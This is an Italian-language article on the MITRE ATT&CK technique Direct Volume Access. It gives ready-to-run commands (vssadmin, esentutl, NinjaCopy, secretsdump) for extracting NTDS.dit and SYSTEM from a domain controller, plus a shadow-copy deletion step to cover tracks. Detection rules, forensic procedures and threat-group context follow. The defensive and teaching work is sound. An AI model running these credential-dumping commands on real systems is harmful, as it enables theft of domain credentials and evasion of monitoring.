Accesso Diretto ai Volumi: Direct Volume Access (T1006)

L'accesso diretto ai volumi è una tecnica che si replica agevolmente in laboratorio perché si appoggia quasi interamente a binari nativi di Windows. L'obiettivo tipico di un red team è dimostrare la possibilità di estrarre NTDS.dit da un domain controller senza che gli strumenti di monitoring file-level registrino l'operazione.

Il primo approccio, il più semplice e il più usato in natura, sfrutta il Volume Shadow Copy Service. Da un prompt elevato sul domain controller:

vssadmin create shadow /for=C:

Una volta creata la shadow copy, il percorso della copia sarà nell'output del comando. Per estrarre il database:

copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Temp\ntds.dit

E il relativo hive SYSTEM, necessario per decifrare gli hash:

copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp\SYSTEM

Dopo l'estrazione, pulisci la shadow copy per ridurre le tracce:

vssadmin delete shadows /shadow={ID_SHADOW}

Il secondo approccio utilizza esentutl (open source — incluso in Windows), il tool nativo per la gestione dei database Extensible Storage Engine. Questo binario può copiare file bloccati tramite il VSS senza creare esplicitamente una shadow copy visibile all'utente:

esentutl /y /vss C:\Windows\NTDS\ntds.dit /d C:\Temp\ntds.dit

Il terzo vettore, più stealth, è NinjaCopy, uno script PowerShell del progetto PowerSploit (open source) che legge direttamente le strutture NTFS del volume raw, bypassando completamente le API di Windows per l'accesso ai file. L'invocazione classica:

Invoke-NinjaCopy -Path "C:\Windows\NTDS\ntds.dit" -LocalDestination "C:\Temp\ntds.dit"

NinjaCopy apre un handle a \\.\C: e interpreta autonomamente la Master File Table, rendendo l'operazione invisibile ai minifilter driver — il cuore della tecnica T1006.

Per il parsing degli hash estratti, secretsdump.py di Impacket (open source) è lo strumento di riferimento:

secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

In un esercizio di purple team, documenta quale dei tre approcci viene intercettato dall'EDR in uso e quale no: il delta è il valore operativo dell'assessment.

Il cuore della detection per questa tecnica ruota attorno a due fonti di log: Sysmon (open source — Microsoft Sysinternals) e i Security Event Log nativi di Windows. L'analisi AN1193 definisce chiaramente il pattern: processi che accedono a raw logical drive come \\.\C: oppure a path del tipo \Device\HarddiskVolume*.

Il primo alert da configurare riguarda la creazione di shadow copy. L'EventCode 4688 (Process Creation) nei Security Log, o l'equivalente EventID 1 di Sysmon, deve triggerare quando la command line contiene vssadmin create shadow o vssadmin list shadows. Il parent process è un indicatore cruciale di contesto: se vssadmin.exe viene lanciato da powershell.exe, cmd.exe o peggio da un processo anomalo, la priorità dell'alert sale. Lo stesso vale per esentutl.exe con i flag /y e /vss nella riga di comando.

Per NinjaCopy e approcci simili, il rilevamento si sposta sugli handle raw. Sysmon EventID 9 (RawAccessRead) cattura i tentativi di lettura diretta su dispositivi fisici. Un regex efficace per il tuning è il pattern \\Device\\HarddiskVolume\d+ e \\.\PhysicalDrive* sul campo TargetObject. Filtra i processi legittimi: i software di backup enterprise e i tool di disk management generano rumore su questo canale. Crea una whitelist esplicita dei binari autorizzati (agente di backup, defrag.exe) e revisiona ogni eccezione trimestralmente.

La correlazione temporale è il terzo pilastro. Un accesso raw al volume seguito entro pochi minuti dalla copia di un file con nome ntds.dit o SYSTEM verso una directory atipica (non i percorsi di backup schedulati) merita un alert ad alta severità. Combina l'EventID 11 di Sysmon (FileCreate) con i pattern già descritti in una finestra di 5 minuti.

Sul fronte preventivo, la mitigazione M1040 (Behavior Prevention on Endpoint) indica di configurare l'EDR per bloccare i comportamenti legati alla creazione di backup non autorizzati. Soluzioni come Microsoft Defender for Endpoint (a pagamento), CrowdStrike Falcon (a pagamento) o Elastic Defend (freemium) offrono regole comportamentali che intercettano l'apertura di handle raw su volumi di sistema. La mitigazione M1018 raccomanda di restringere i privilegi: solo gli account esplicitamente autorizzati per il backup devono detenere il privilegio SeBackupPrivilege. Monitora l'assegnazione di questo privilegio tramite EventCode 4672 (Special Logon) e genera alert se compare su account non presenti nella lista approvata.

Per i network device, l'analisi AN1194 segnala che comandi CLI come copy flash:, format o partition su apparati di rete meritano un canale di detection dedicato nei log networkdevice:cli, filtrando per interazioni con volumi interni rispetto a supporti rimovibili.

L'indagine forense su un sospetto Direct Volume Access parte da un principio operativo: l'attaccante ha aggirato il file system, quindi gli artefatti tradizionali di accesso ai file (come i log di audit NTFS) potrebbero essere incompleti o assenti. La ricostruzione si appoggia perciò a fonti indirette e a tracce residuali.

Il primo artefatto da acquisire è il log del Volume Shadow Copy Service. Il registro eventi Microsoft-Windows-VSSVC e il canale Application registrano la creazione e la cancellazione delle shadow copy. Cerca gli EventID 8224 (creazione VSS) e confrontali con eventuali EventID 8225 (cancellazione): un ciclo rapido creazione-cancellazione entro pochi minuti è un pattern coerente con l'esfiltrazione da shadow copy. Il comando:

wevtutil qe "Application" /q:"[System[Provider[@Name='VSS']]]" /f:text*

estrae gli eventi VSS dal log Application per l'analisi offline.

Il secondo pilastro è la Master File Table ($MFT). Anche se NinjaCopy legge direttamente la MFT senza creare entry di audit, il file copiato in uscita — tipicamente ntds.dit in una directory temporanea — genera comunque una entry MFT con timestamp di creazione. Con MFTECmd (open source — Eric Zimmerman's Tools):

MFTECmd.exe -f C:\Evidence$MFT --csv C:\Output

Filtra il CSV risultante cercando nomi file come ntds.dit, SYSTEM, SAM in percorsi anomali (non C:\Windows\NTDS\ o C:\Windows\System32\config\). I timestamp $SI e $FN della entry ti dicono quando il file è stato materializzato.

Il terzo artefatto sono i Prefetch di Windows. L'esecuzione di vssadmin.exe, esentutl.exe o di powershell.exe con NinjaCopy genera file .pf nella directory Prefetch. Con PECmd (open source — Eric Zimmerman's Tools):

PECmd.exe -d C:\Windows\Prefetch --csv C:\Output

Ogni file Prefetch contiene fino a 8 timestamp di esecuzione e la lista dei file referenziati — se VSSADMIN.EXE-*.pf mostra riferimenti a percorsi del database AD, hai una corroborazione forte.

Nella campagna APT28 Nearest Neighbor (C0051), l'esecuzione di vssadmin per il dump dell'NTDS.dit è documentata come parte di un'operazione living-off-the-land. L'analista che ricostruisce una catena simile deve cercare la convergenza di tre indicatori nella stessa finestra temporale: creazione VSS, materializzazione di file AD in directory non standard e successiva attività di rete in uscita (staging per esfiltrazione). La timeline si costruisce allineando eventi VSS, entry MFT e Prefetch su un asse temporale comune — strumenti come Timeline Explorer (open source — Eric Zimmerman's Tools) permettono di importare tutti i CSV e correlare visivamente.

I due gruppi documentati su questa tecnica offrono un contrasto interessante per metodo e finalità, pur condividendo lo stesso obiettivo tattico: l'estrazione di credenziali da Active Directory attraverso l'accesso diretto ai volumi.

Scattered Spider (G1015) è un gruppo noto per le sue operazioni orientate al furto d'identità e all'accesso a risorse cloud enterprise. Nel contesto T1006, Scattered Spider ha creato copie shadow di dischi di domain controller virtuali — un dettaglio significativo perché indica operazioni in ambienti virtualizzati (VMware, Hyper-V), dove il gruppo accede direttamente ai file VMDK/VHDX del controller per estrarre l'NTDS.dit senza nemmeno operare all'interno del guest OS. Questo approccio suggerisce un livello di accesso all'hypervisor che implica una compromissione profonda dell'infrastruttura di virtualizzazione, e va correlato con tecniche di escalation verso vCenter o simili.

Volt Typhoon (G1017) adotta un profilo più tradizionale ma altrettanto efficace: esecuzione diretta di vssadmin come comando nativo di Windows. Il gruppo è associato a operazioni di spionaggio e pre-posizionamento su infrastrutture critiche, con una filosofia living-off-the-land che minimizza l'uso di malware custom. L'impiego di vssadmin è perfettamente coerente con questo approccio: nessun binario aggiuntivo da scaricare, nessuna firma di tool esterno da gestire.

La campagna APT28 Nearest Neighbor (C0051), condotta tra febbraio 2022 e novembre 2024, aggiunge una dimensione ulteriore. APT28 ha combinato il dump NTDS.dit tramite vssadmin con una catena di accesso iniziale altamente sofisticata basata sullo sfruttamento di reti Wi-Fi adiacenti al bersaglio, concatenando organizzazioni compromesse per raggiungere sistemi dual-homed. L'uso di CVE-2022-38028 come zero-day e la strategia living-off-the-land rendono questa campagna un caso di studio su come una tecnica relativamente semplice (shadow copy + copia file) si inserisca in un'operazione complessa con mesi di persistenza.

Il pattern emergente è chiaro: T1006 è una tecnica "last-mile" per la raccolta credenziali AD, usata da gruppi con capacità e mandati molto diversi — dal cybercrime (Scattered Spider) allo spionaggio statale (Volt Typhoon, APT28). Il software esentutl (S0404) rappresenta un'alternativa ai metodi shadow copy, capace di copiare file bloccati tramite VSS in modo meno visibile. Per il threat intelligence, monitorare l'abuso di binari nativi Windows legati a VSS e a database ESE resta un indicatore trasversale che attraversa settori e attori.

Framework MITRE ATT&CK v16 — Tecnica T1006 (Direct Volume Access), Tattica TA0005, Campagna C0051, Gruppi G1015 e G1017, Software S0404, Mitigazioni M1040 e M1018, Detection DET0426 (AN1193, AN1194). Integrato con conoscenza professionale per tool e procedure operative.